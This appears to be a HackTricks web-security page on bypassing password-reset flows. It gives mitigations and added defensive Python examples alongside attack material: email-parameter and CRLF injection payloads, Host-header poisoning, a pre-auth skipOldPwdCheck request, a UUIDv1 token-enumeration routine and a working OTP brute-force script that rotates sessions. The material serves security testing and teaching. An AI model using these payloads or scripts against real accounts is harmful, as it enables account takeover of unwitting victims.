Reset/Forgotten Password Bypass
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Password Reset Token Leak Via Referrer
- The HTTP Referer header can leak the password reset token when the token is carried in the URL. This happens when the user, after requesting a reset, follows a link to a third-party site from the reset page.
- Impact: potential account takeover, since the third party (and anything with access to its logs or analytics) receives a valid reset token for the victim's account.
- Exploitation: to check whether the reset token leaks in the Referer header, request a password reset for your own email address and click the reset link you receive. Do not change the password yet. Instead, navigate to a third-party website (such as Facebook or Twitter) from that page while capturing the requests with Burp Suite. Inspect the outgoing requests for a Referer header containing the reset token, as this would expose sensitive information to third parties.
- References:
- HackerOne Report 342693
- HackerOne Report 272379
- Password Reset Token Leak Article
Password Reset Poisoning
- Attackers can manipulate the Host header during the password reset request so that the reset link emailed to the victim points to a domain the attacker controls.
- Impact: account takeover, because the victim's click sends the reset token to the attacker's server.
- Mitigation:
- Validate the Host header against a whitelist of allowed domains.
- Build absolute URLs from server-side configuration, never from request headers.
- Patch: use $_SERVER['SERVER_NAME'] to build password reset URLs instead of $_SERVER['HTTP_HOST']. Note that under Apache SERVER_NAME is itself filled from the client's Host header unless UseCanonicalName is On and ServerName is set, so the whitelist check is still needed.
- References:
- Acunetix Article on Password Reset Poisoning
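The following is an added example, not code from the original page: a reset-link builder that shows the poisoning pattern next to the allowlisted version. The hostnames, the `reset_password.php` path and the headers dict are constructed for the example; a real application would read the allowlist and canonical origin from its configuration.

```python
# Added example (not from the original page): building the reset link from a
# server-side allowlist instead of the client-controlled Host header.
import re
from urllib.parse import urlencode

# Constructed configuration for this example; a real app loads it from settings.
ALLOWED_HOSTS = {"app.example.com", "www.example.com"}
CANONICAL_ORIGIN = "https://app.example.com"

# A bare hostname: labels of letters, digits and hyphens joined by dots. Nothing else.
_HOSTNAME_RE = re.compile(
    r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*"
)


def hostname_from_host_header(host_header: str):
    """Normalise a Host header to a lower-case hostname without port, or None if it is not one."""
    host = host_header.strip().lower().split(":", 1)[0]
    return host if _HOSTNAME_RE.fullmatch(host) else None


def build_reset_url_vulnerable(headers: dict, token: str) -> str:
    """Reset-poisoning pattern: the link host is whatever the client sent
    (X-Forwarded-Host first, then Host, as many frameworks do)."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    return f"https://{host}/reset_password.php?{urlencode({'token': token})}"


def build_reset_url_hardened(headers: dict, token: str) -> str:
    """Only an allowlisted Host is echoed back; anything else falls back to the canonical
    origin. X-Forwarded-Host is ignored on purpose: it is just as attacker-controlled."""
    host = hostname_from_host_header(headers.get("Host", ""))
    origin = f"https://{host}" if host in ALLOWED_HOSTS else CANONICAL_ORIGIN
    return f"{origin}/reset_password.php?{urlencode({'token': token})}"


if __name__ == "__main__":
    poisoned = {"Host": "attacker.tld"}          # constructed attacker request
    print("vulnerable:", build_reset_url_vulnerable(poisoned, "t0k3n"))
    print("hardened:  ", build_reset_url_hardened(poisoned, "t0k3n"))
```

Falling back to the canonical origin rather than failing keeps the flow working for legitimate users behind a misconfigured proxy, while the attacker never gets a link to their own host; log the mismatch either way, since it is a strong attack signal.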
Password Reset By Manipulating Email Parameter
Attackers can manipulate the password reset request by adding extra email parameters so that the reset link is delivered to an address they control. Variants to try:
- Add the attacker's email as a second parameter using &
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
- Add the attacker's email as a second parameter using %20
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
- Add the attacker's email as a second parameter using |
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
- Add the attacker's email as a second recipient using a CRLF-injected cc header
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
- Add the attacker's email as a second recipient using a CRLF-injected bcc header
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
- Add the attacker's email as a second parameter using ,
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
- Add the attacker's email as a second element of a JSON array
POST /resetPassword
[...]
{"email":["victim@mail.tld","attacker@mail.tld"]}
- Mitigation:
- Parse and validate the email parameter strictly on the server side: exactly one value, matching a strict email pattern, with no whitespace, separators or control characters.
- Use prepared statements or parameterized queries to prevent injection attacks.
- References:
- https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
- https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
- https://twitter.com/HusseiN98D/status/1254888748216655872
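The following is an added example, not code from the original page or from any of the reports above: a server-side extractor that accepts exactly one well-formed recipient and rejects every smuggling variant listed, next to a "last value wins" parser of the kind that lets the attacker's address through. The request bodies it is exercised with are the payloads above; the function and class names are assumptions for the example.

```python
# Added example (not from the original page): server-side extraction of exactly one
# well-formed recipient from a reset request, rejecting every smuggling variant above.
import json
import re
from urllib.parse import parse_qs

# Deliberately strict: one local part, one domain with at least one dot, no quotes,
# whitespace, commas, pipes or control characters (simplified versus RFC 5322 on purpose).
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


class BadEmailParameter(ValueError):
    """Raised when the request does not carry exactly one valid email."""


def naive_email(form_body: str) -> str:
    """What a 'last value wins' parser hands to the mailer (PHP's $_POST behaves this way).
    Shown only to contrast with extract_single_email()."""
    return parse_qs(form_body, keep_blank_values=True).get("email", [""])[-1]


def extract_single_email(body: str, content_type: str) -> str:
    if content_type.split(";")[0].strip().lower() == "application/json":
        try:
            data = json.loads(body)
        except json.JSONDecodeError as exc:
            raise BadEmailParameter("body is not valid JSON") from exc
        value = data.get("email") if isinstance(data, dict) else None
        # A list, number or object here is the JSON-array variant of the attack.
        values = [value] if isinstance(value, str) else []
    else:
        # parse_qs keeps *all* repeated keys, so a duplicated email shows up as len(values) == 2
        # instead of silently overwriting the victim's address.
        values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        raise BadEmailParameter(f"expected exactly one email parameter, got {len(values)}")
    email = values[0]
    # %20, |, ',' and the CRLF-injected cc:/bcc: headers all survive URL decoding inside
    # this single value; the strict pattern rejects each of them.
    if not _EMAIL_RE.fullmatch(email):
        raise BadEmailParameter("email failed strict validation")
    return email


def is_rejected(body: str, content_type: str = "application/x-www-form-urlencoded") -> bool:
    """Convenience wrapper used to check the payloads from the list above."""
    try:
        extract_single_email(body, content_type)
    except BadEmailParameter:
        return True
    return False


if __name__ == "__main__":
    body = "email=victim@email.com&email=attacker@email.com"   # constructed attack body
    print("naive parser would mail:", naive_email(body))
    print("strict parser rejects it:", is_rejected(body))
```

The design choice is to refuse rather than "clean": stripping a trailing `cc:` line or taking the first of two values still leaves the application guessing what the mail library will do with the rest.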
Changing the email and password of any user through API parameters
- Attackers can modify the email and password parameters in API requests to change the credentials of an account they do not own.
POST /api/changepass
[...]
{"form": {"email":"victim@email.tld","password":"12345678"}}
- Mitigation:
- Enforce strict parameter validation and authorization checks: the account being modified must be the one the caller is authenticated as, never one named in the request body.
- Implement robust logging and monitoring to detect and respond to suspicious activity.
- References:
- Full Account Takeover via API Parameter Manipulation
No Rate Limiting: Email Bombing
- The absence of rate limiting on password reset requests allows Email Bombing: flooding a user with reset emails.
- Mitigation:
- Enforce rate limiting per IP address and per target account.
- Use CAPTCHA challenges to block automated abuse.
- References:
- HackerOne Report 280534
Find out how the password reset token is generated
- Understanding the pattern or method behind token generation can allow tokens to be predicted or brute-forced. Common weak inputs:
- Based on a timestamp
- Based on the user ID
- Based on the user's email
- Based on first name and last name
- Based on date of birth
- Based on cryptography (for example a hash or encryption of the values above)
- Mitigation:
- Generate tokens with a cryptographically secure random number generator.
- Ensure sufficient randomness and length to make prediction infeasible.
- Tools: use Burp Sequencer to analyse the randomness of tokens.
Guessable UUID
- If UUIDs (version 1) are used as reset tokens they are guessable: the value is a 100 ns timestamp plus a clock sequence and node identifier, so an attacker who holds one token from the same generator can enumerate the neighbouring ones.
- Mitigation:
- Use GUID version 4 for randomness, or add extra security measures when other versions must be used.
- Tools: use guidtool to analyse and generate GUIDs.
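The following is an added example, not code from the original page or from guidtool: it decomposes a version-1 UUID into its fields and performs the "sandwich" enumeration, where two tokens the attacker requested for themselves bracket the victim's token in time. The node, clock sequence and timestamps are constructed values; the reset endpoint is stood in for by a callback.

```python
# Added example (not from the original page): why a UUIDv1 reset token is guessable.
# A v1 UUID is (60-bit 100 ns timestamp, 14-bit clock sequence, 48-bit node/MAC) plus a
# 4-bit version and 2-bit variant; only the timestamp moves between two tokens minted by
# the same process, so a token of your own brackets the victim's in time.
import uuid


def uuid1_fields(u: uuid.UUID) -> dict:
    """The pieces an attacker reads straight out of a leaked token."""
    return {"version": u.version, "time": u.time, "clock_seq": u.clock_seq, "node": u.node}


def make_uuid1(timestamp: int, clock_seq: int, node: int) -> uuid.UUID:
    """Rebuild a version-1 UUID from its parts (inverse of the properties above)."""
    time_low = timestamp & 0xFFFFFFFF
    time_mid = (timestamp >> 32) & 0xFFFF
    time_hi_version = ((timestamp >> 48) & 0x0FFF) | (1 << 12)   # version 1
    clock_seq_hi_variant = ((clock_seq >> 8) & 0x3F) | 0x80       # RFC 4122 variant
    clock_seq_low = clock_seq & 0xFF
    return uuid.UUID(fields=(time_low, time_mid, time_hi_version,
                             clock_seq_hi_variant, clock_seq_low, node))


def sandwich_candidates(before: uuid.UUID, after: uuid.UUID):
    """Every v1 UUID the same generator could have produced strictly between two tokens
    the attacker obtained for themselves (the victim's reset was requested in between)."""
    if not (before.version == after.version == 1):
        raise ValueError("sandwich enumeration only applies to version-1 UUIDs")
    if (before.node, before.clock_seq) != (after.node, after.clock_seq):
        raise ValueError("different node/clock_seq: tokens came from different generators")
    for t in range(before.time + 1, after.time):
        yield make_uuid1(t, before.clock_seq, before.node)


def recover_token(before, after, is_valid_token):
    """Try each candidate against an oracle (in practice the reset endpoint) and return the hit."""
    for cand in sandwich_candidates(before, after):
        if is_valid_token(cand):
            return cand
    return None


if __name__ == "__main__":
    # Constructed scenario: attacker requests a reset, the victim does, the attacker again.
    node, clock_seq = 0x001122334455, 0x1ABC
    t0 = uuid.uuid1(node=node, clock_seq=clock_seq).time
    attacker_first = make_uuid1(t0, clock_seq, node)
    victim = make_uuid1(t0 + 7_500, clock_seq, node)          # 0.75 ms later
    attacker_second = make_uuid1(t0 + 20_000, clock_seq, node)  # 2 ms later
    print("victim token fields:", uuid1_fields(victim))
    found = recover_token(attacker_first, attacker_second, lambda c: c == victim)
    print("recovered:", found, "from at most", attacker_second.time - attacker_first.time - 1, "guesses")
    print("v4 for comparison:", uuid1_fields(uuid.uuid4()))
```

The number of guesses is bounded by the time between the attacker's two requests measured in 100 ns ticks, which is why the attack is practical against any endpoint without strict per-account attempt limits; a version-4 UUID carries 122 random bits and no such structure.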
Response Manipulation: Replace Bad Response With Good One
- Intercept the HTTP response to a failed verification step (wrong OTP, invalid token) and replace it with the success response, to see whether the client advances to the next step (for example the set-new-password form) and whether the server then accepts the password change.
- Mitigation:
- Track the state of the reset flow on the server side; a success response rendered by the client must never be what authorises the password change.
- HTTPS does not help here: the attacker is intercepting their own traffic with a proxy, so the fix is purely server-side.
- References:
- Critical Bug in Live Bug Bounty Event
Using Expired Token
- Test whether expired tokens are still accepted for a password reset.
- Mitigation:
- Enforce strict token expiry policies and validate the expiry on the server side.
Brute Force Password Reset Token
- Try to brute-force the reset token using tools such as Burp Suite with IP-Rotator to bypass IP-based rate limits.
- Mitigation:
- Implement robust rate limiting and account lockout mechanisms.
- Monitor for suspicious activity indicative of brute-force attacks.
Try Using Your Token
- Test whether a reset token issued to the attacker can be used together with the victim's email.
- Mitigation:
- Bind tokens to the account (and, where applicable, the session) they were issued for, and verify that binding before changing the password.
Session Invalidation in Logout/Password Reset
- Check that sessions are invalidated when a user logs out or resets their password.
- Mitigation:
- Implement proper session management, ensuring that all sessions are invalidated after logout or password reset.
Reset Token Expiration Time
- Reset tokens must have an expiration time after which they become invalid.
- Mitigation:
- Set an appropriate expiration time for reset tokens and enforce it strictly on the server side.
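The following is an added example, not code from the original page: one reset-token lifecycle that covers the points of the preceding sections (CSPRNG generation, hashed storage, expiry, binding to the account, single use, and invalidation of every session on success). The in-memory stores, the 15-minute lifetime and the function names are assumptions for the example; a real service would back them with a database.

```python
# Added example (not from the original page): a reset-token lifecycle that addresses the
# generation, expiry, account-binding, single-use and session-invalidation points above.
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60       # short lifetime; expiry is enforced server-side


def _digest(token: str) -> str:
    # Store only a hash: a database dump must not hand out live tokens.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


class ResetTokenStore:
    """In-memory stand-in for a DB table keyed by user id (one live token per account)."""

    def __init__(self, now=time.time):
        self._now = now
        self._by_user = {}            # user_id -> (sha256 hex, expires_at)

    def issue(self, user_id: str) -> str:
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        # Overwriting the entry means an older token for the same account dies here.
        self._by_user[user_id] = (_digest(token), self._now() + TOKEN_TTL_SECONDS)
        return token                                # goes into the email link, never stored

    def consume(self, user_id: str, token: str) -> bool:
        """True once, and only for the account the token was issued to."""
        entry = self._by_user.get(user_id)
        if entry is None:
            return False                            # no token for this account: "use your own token" fails
        stored_digest, expires_at = entry
        if self._now() > expires_at:
            del self._by_user[user_id]              # expired tokens are deleted, not merely ignored
            return False
        if not hmac.compare_digest(stored_digest, _digest(token)):
            return False                            # constant-time compare: no timing oracle
        del self._by_user[user_id]                  # single use
        return True


class SessionStore:
    def __init__(self):
        self._sessions = {}           # session_id -> user_id

    def create(self, user_id: str) -> str:
        sid = secrets.token_urlsafe(24)
        self._sessions[sid] = user_id
        return sid

    def user_for(self, session_id: str):
        return self._sessions.get(session_id)

    def invalidate_all(self, user_id: str) -> int:
        doomed = [s for s, u in self._sessions.items() if u == user_id]
        for s in doomed:
            del self._sessions[s]
        return len(doomed)


def complete_reset(tokens, sessions, passwords, user_id, token, new_password) -> bool:
    """The only path that changes a password without the old one: needs a live, bound token."""
    if not tokens.consume(user_id, token):
        return False
    salt = secrets.token_bytes(16)
    passwords[user_id] = (salt, hashlib.scrypt(new_password.encode(), salt=salt, n=2**14, r=8, p=1))
    sessions.invalidate_all(user_id)    # every other device is logged out
    return True


if __name__ == "__main__":
    tokens, sessions, passwords = ResetTokenStore(), SessionStore(), {}
    old_session = sessions.create("alice")
    link_token = tokens.issue("alice")
    print("reset with bob's id:", complete_reset(tokens, sessions, passwords, "bob", link_token, "x"))
    print("reset with alice's id:", complete_reset(tokens, sessions, passwords, "alice", link_token, "N3w-Passw0rd!"))
    print("old session still valid:", sessions.user_for(old_session) is not None)
```

Keying the store by user id rather than by token is what makes the binding check natural: the token is only ever compared against the one issued to the account named in the request, so a token the attacker obtained for their own account is simply never looked up against the victim.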
OTP rate limit bypass by changing your session
- If the site tracks failed OTP attempts per user session and the OTP is weak (<= 4 digits), the OTP can be brute-forced effectively.
- Exploitation:
- Simply request a new session token after the server blocks the current one.
- Example code that exploits this bug by guessing the OTP at random (when the session changes the OTP changes too, so it cannot be brute-forced sequentially):
# Authentication bypass by password reset
# by coderMohammed
import random
from time import sleep

import requests

headers = {
    "User-Agent": "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1",
    "Cookie": "PHPSESSID=mrerfjsol4t2ags5ihvvb632ea"
}

url = "http://10.10.12.231:1337/reset_password.php"
logout = "http://10.10.12.231:1337/logout.php"
root = "http://10.10.12.231:1337/"

parms = dict()
ter = 0           # number of guesses made with the current session
phpsessid = ""

print("[+] Starting attack!")
sleep(3)
print("[+] This might take around 5 minutes to finish!")

try:
    while True:
        parms["recovery_code"] = f"{random.randint(0, 9999):04}"  # random code from 0000 to 9999, zero-padded
        parms["s"] = 164  # not important, it only affects the frontend
        res = requests.post(url, data=parms, allow_redirects=True, verify=False, headers=headers)
        if ter == 8:  # the server locks a session after a few failures, so rotate before that happens
            out = requests.get(logout, headers=headers)  # log the current session out
            mainp = requests.get(root)                    # a fresh visit hands out a new PHPSESSID
            phpsessid = out.cookies.get("PHPSESSID") or mainp.cookies.get("PHPSESSID")  # extract the new session id
            headers["Cookie"] = f"PHPSESSID={phpsessid}"  # switch the Cookie header to the new session
            reset = requests.post(url, data={"email": "tester@hammer.thm"}, allow_redirects=True, verify=False, headers=headers)  # request a new code for the victim in the new session
            ter = 0  # restart the count; the next 8 guesses go against the new session
        else:
            ter += 1
        if len(res.text) == 2292:  # length of the page returned when the recovery code is correct (found by testing)
            print(len(res.text))  # debug info
            print(phpsessid)
            reset_data = {  # change the password to something new
                "new_password": "D37djkamd!",
                "confirm_password": "D37djkamd!"
            }
            reset2 = requests.post(url, data=reset_data, allow_redirects=True, verify=False, headers=headers)
            print("[+] Password has been changed to: D37djkamd!")
            break
except Exception as e:
    print(f"[+] Attack stopped: {e}")
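The following is an added example, not code from the original page or from the script above: the server-side fix for this bypass, which also covers the email-bombing case from the "No Rate Limiting" section. Attempt budgets are keyed by the targeted email address rather than by the caller's session, so neither rotating PHPSESSID nor re-requesting the code resets them. The class names, limits and the replay of the attack are constructed for the example.

```python
# Added example (not from the original page): attempt limiting keyed by the targeted
# account rather than by the caller's session, so neither rotating the session cookie
# nor re-requesting the code resets the budget. Covers both the OTP brute force above
# and email bombing (reset requests per address).
import hmac
import secrets
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    def __init__(self, max_events: int, window_seconds: float, now=time.time):
        self.max_events, self.window, self._now = max_events, window_seconds, now
        self._events = defaultdict(deque)       # key -> timestamps of recent events

    def allow(self, key: str) -> bool:
        now = self._now()
        q = self._events[key]
        while q and q[0] <= now - self.window:   # drop events outside the window
            q.popleft()
        if len(q) >= self.max_events:
            return False
        q.append(now)
        return True


class OtpResetFlow:
    """Minimal reset-by-OTP service. Both limiters are keyed by the email, never the session."""

    def __init__(self, now=time.time, otp_digits: int = 6, code_factory=None):
        self._now = now
        self._digits = otp_digits
        # code_factory is injectable only so the flow can be tested deterministically.
        self._code_factory = code_factory or (lambda d: f"{secrets.randbelow(10 ** d):0{d}d}")
        self._codes = {}                                          # email -> (code, expires_at)
        self._send_limiter = SlidingWindowLimiter(3, 3600, now)   # email bombing: 3 mails/hour
        self._verify_limiter = SlidingWindowLimiter(5, 900, now)  # guessing: 5 tries/15 min

    def request_code(self, email: str):
        """Returns the code that would be emailed, or None if this address is being bombed."""
        if not self._send_limiter.allow(email):
            return None
        code = self._code_factory(self._digits)
        self._codes[email] = (code, self._now() + 600)
        return code

    def verify(self, email: str, guess: str, session_id: str) -> str:
        """'ok' | 'wrong' | 'locked'. session_id is accepted but plays no part in limiting."""
        if not self._verify_limiter.allow(email):
            return "locked"
        entry = self._codes.get(email)
        if entry is None or self._now() > entry[1]:
            return "wrong"
        if hmac.compare_digest(entry[0], guess):
            del self._codes[email]                  # single use
            return "ok"
        return "wrong"


def session_rotation_attack(flow, email, guesses, rotate_every=8):
    """Replays the attack above against `flow`: a new session and a re-requested code every
    `rotate_every` guesses. Returns (outcome, guesses_made, sessions_rotated)."""
    session = secrets.token_hex(8)
    rotated = 0
    n = 0
    flow.request_code(email)
    for n, guess in enumerate(guesses, start=1):
        if n > 1 and (n - 1) % rotate_every == 0:
            session = secrets.token_hex(8)
            rotated += 1
            flow.request_code(email)                # re-sending the code must not reset the budget
        outcome = flow.verify(email, guess, session)
        if outcome != "wrong":
            return outcome, n, rotated
    return "exhausted", n, rotated


if __name__ == "__main__":
    flow = OtpResetFlow(otp_digits=4)
    wrong_guesses = (f"{i:04d}" for i in range(10_000))   # constructed sequential guesses
    print(session_rotation_attack(flow, "victim@example.com", wrong_guesses))
```

With a 4-digit code and a budget of five guesses per window, an attacker's chance per window is 5/10000 regardless of how many sessions they burn; the remaining lever is the window length, which is why the limiter is combined with a short code lifetime.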
Arbitrary password reset via skipOldPwdCheck (pre-auth)
Some implementations expose a password-change action that calls the password-change routine with skipOldPwdCheck=true and verifies neither a reset token nor ownership of the account. If the endpoint accepts an action parameter such as change_password together with a username and new password in the request body, an attacker can reset any account's password without authenticating (pre-auth).
Vulnerable pattern (PHP):
// hub/rpwd.php
RequestHandler::validateCSRFToken();
$RP = new RecoverPwd();
$RP->process($_REQUEST, $_POST);
// modules/Users/RecoverPwd.php
if ($request['action'] == 'change_password') {
$body = $this->displayChangePwd($smarty, $post['user_name'], $post['confirm_new_password']);
}
public function displayChangePwd($smarty, $username, $newpwd) {
$current_user = CRMEntity::getInstance('Users');
$current_user->id = $current_user->retrieve_user_id($username);
// ... criteria checks omitted ...
$current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, true); // skipOldPwdCheck=true
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
Exploitation request (hypothetical):
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
Mitigation:
- Always require a valid, time-limited reset token bound to the account (and session) before changing the password.
- Never expose skipOldPwdCheck paths to unauthenticated users; regular password changes must require authentication and verification of the old password.
- Invalidate all active sessions and all outstanding reset tokens after a password change.
References
- https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token
- https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/